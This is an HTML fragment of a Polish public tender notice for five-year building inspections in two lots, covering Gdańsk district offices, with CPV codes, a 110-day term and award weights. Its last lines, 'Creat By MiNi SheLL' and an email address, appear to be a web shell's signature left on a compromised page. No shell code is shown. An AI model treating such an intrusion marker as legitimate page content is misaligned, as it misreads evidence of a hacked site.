<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonywanie przeglądów 5 -letnich obiektów budowlanych będących w zarządzie GZNK SZB na terenie administrowanym przez BOM 1, 2 i 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje wykonywanie przeglądów 5 -letnich 142 obiektów budowlanych będących w zarządzie GZNK SZB na terenach administrowanych przez:<br>
 BOM- 1, siedziba: Gdańsk  ul. Sienna 6;  - 46 obiektów, <br>
 BOM- 2,  siedziba: Gdańsk  ul. Zielona 8/9; - 11 obiektów, <br>
 BOM- 4,  siedziba: Gdańsk  ul. Trakt Św. Wojciecha 167B; - 85 obiektów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.70.00-3, 71.63.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 110.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.85</li>
<li>2. Termin wykonania zamówienia - 0.15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonywanie przeglądów 5 -letnich obiektów budowlanych będących w zarządzie GZNK SZB na terenie administrowanym przez BOM 7, 8 i 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje wykonywanie przeglądów 5 -letnich 89 obiektów budowlanych będących w zarządzie GZNK SZB na terenach administrowanych przez:<br>
 BOM-7, siedziba: Gdańsk  ul. Mściwoja II 44;  - 48 obiektów, <br>
 BOM- 8,  siedziba: Gdańsk  ul. Śniadeckich 12 - 26 obiektów, <br>
 BOM- 9,  siedziba: Gdańsk  ul. Na Zaspę 31; - 15 obiektów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.70.00-3, 71.63.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 110.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.85</li>
<li>2. Termin wykonania zamówienia - 0.15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com